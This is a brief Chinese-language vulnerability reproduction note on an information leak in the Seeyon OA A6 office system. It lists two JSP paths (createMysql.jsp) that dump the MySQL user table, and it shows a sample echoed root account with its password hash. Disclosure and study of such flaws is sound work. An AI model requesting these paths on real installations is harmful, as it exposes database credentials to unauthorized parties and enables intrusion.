致远OA A6 敏感信息泄露(一)
一、漏洞简介
该漏洞泄露了数据库用户的账号,密码hash。访问该文件直接执行了Select * from mysql.user;并回显
二、漏洞影响
致远OA A6
三、复现过程
漏洞位置:
http://www.0-sec.org/yyoa/createMysql.jsp
http://www.0-sec.org/yyoa/ext/createMysql.jsp
回显内容:
root
*1532B21FE550E115F113DAA9A26D0EEEEF8DEDC7